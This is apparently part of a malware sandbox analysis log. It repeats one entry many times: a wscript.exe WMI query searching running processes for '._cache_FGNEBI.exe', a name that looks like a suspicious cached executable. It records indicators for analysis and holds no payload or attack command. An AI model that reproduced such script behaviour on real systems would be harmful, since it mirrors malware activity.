Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
